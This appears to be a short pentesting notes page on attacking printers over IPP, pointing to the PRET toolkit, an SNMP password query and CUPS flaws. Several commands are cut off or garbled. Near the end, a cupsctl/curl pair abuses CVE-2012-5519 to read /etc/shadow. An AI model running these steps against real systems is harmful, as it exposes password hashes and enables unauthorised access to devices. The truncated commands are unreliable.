Internet Printing Protocol (IPP)

The Internet Printing Protocol (IPP) is protocol to manage printers and print jobs, query printer status, and other tasks.

🐊️ Port: 631 (TCP)

Refer to the IPP Guide. Not all printers use the IPP protocol. See also: Hacking Network Printers.

IPP vulnerabilities ☠️


πŸ‘‰ See the Printer Security Testing Cheat Sheet.

You can use the PRET (3.4k ⭐) toolkit to try to exploit printers using the IPP protocol. You can install it using:

$ git clone && cd PRET
$ python2 -m pip install colorama pysnmP

Discover printers

$ python

Once you found a printer, you must find which language the printer understands

  • xxx.lan ps: Postscript language
  • IP pjl: Printer Job language
  • /dev/usb/lp0 pcl: Printer Command Language, Must be directly connected (for instance, by USB).
$ python [options above]
xxx> help

➑️ You can check the web interface (IP:631) if any.

➑️ You may use PRETty (0.2k ⭐), an automation of PRET in python.

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.


  • SNMP could be used to get the printer password (snmpget -v 1 -c public IP .
bytes_hex = "<returned bytes here>"
bytes_list = bytes_hex.split()
print("".join([chr(int(byte, 16)) for byte in bytes_list]))
  • CUPS (CVE-2012-5519 == arbitrary read or if there are printers, we can also use CVE-2015-1158)
$ cupsctl ErrorLog=/etc/shadow
$ curl localhost:631/admin/log/error_log?